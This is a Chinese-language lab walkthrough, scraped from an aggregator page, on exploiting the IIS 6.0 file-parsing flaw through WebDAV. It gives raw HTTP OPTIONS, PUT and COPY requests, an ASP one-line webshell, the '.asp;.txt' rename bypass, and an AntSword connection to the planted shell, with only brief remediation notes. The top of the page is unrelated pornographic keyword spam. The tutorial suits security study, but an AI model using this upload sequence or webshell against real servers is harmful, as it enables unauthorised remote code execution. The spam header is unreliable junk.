日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

IIS6.0文件解析漏洞

發布時間:2023/12/18 编程问答 31 豆豆
生活随笔 收集整理的這篇文章主要介紹了 IIS6.0文件解析漏洞 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

目錄

一、相關知識

1、IIS6.0解析漏洞介紹

2、IIS6.0PUT上傳原理

?3、IIS6.0解析文件類型

4、IIS6.0文件解析漏洞修復方案

二、環境配置

三、文件上傳

1、設置代理

?2、靶機環境配置

?3、截取數據包

?4、探測漏洞

?5、創建文件,并寫入一句話木馬

?6、復制文件并重命名,繞過攔截

四、蟻劍連接


一、相關知識

1、IIS6.0解析漏洞介紹

(1)當建立*.asa、*.asp格式的文件夾時,其目錄下的任意文件都將被IIS當做asp文件解析。

(2)當文件*.asp:1.jpg IIS6.0同樣會將文件當做asp文件解析。

2、IIS6.0PUT上傳原理

WebDAV基于HTTP1.1協議的通信是的HTTP支持PUT、MOVE、COPY、DELETE方法。

(1)探測是否存在IIS漏洞:

OPTIONS / HTTP1.1 Host:www.xxx.com

?(2)上傳txt文本文件

PUT /文件名.后綴名 HTTP1.1 Host:www.xxx.com Content-Length:30 <%eval request(“chopper”)%>

?(3)通過MOVE或COPY重名

COPY /文件名.后綴名 HTTP1.1 Host:www.xxx.com Destination:http://www.xxx.com/重命名的文件名.后綴名;.后綴名

(4)刪除

DELETE /文件名.后綴名 HTTP1.1 Host:www.xxx.com

?3、IIS6.0解析文件類型

IIS6.0默認的可執行文件為:.asp、.asa、.cer、.cdx

4、IIS6.0文件解析漏洞修復方案

(1)目前尚無微軟官方的補丁,可以通過自己編寫的正則阻止XX.asp;.jpg類型的文件名。

(2)做好權限設置,限制用戶創建文件夾

二、環境配置

攻擊機:kaliIP:192.168.2.2
靶機:Windows2008IP:192.168.2.130:8058

三、文件上傳

1、設置代理

(1)瀏覽器設置代理

?(2)Burpsuite設置代理

?2、靶機環境配置

(1)設置寫入權限

?(2)設置WebDAV為允許

?3、截取數據包

?4、探測漏洞

?5、創建文件,并寫入一句話木馬

木馬:<%eval request("cmd")%>

?6、復制文件并重命名,繞過攔截

四、蟻劍連接

連接目標URL:192.168.2.130:8058/123.asp;.txt 密碼:cmd

?

?

?

?

?

總結

以上是生活随笔為你收集整理的IIS6.0文件解析漏洞的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。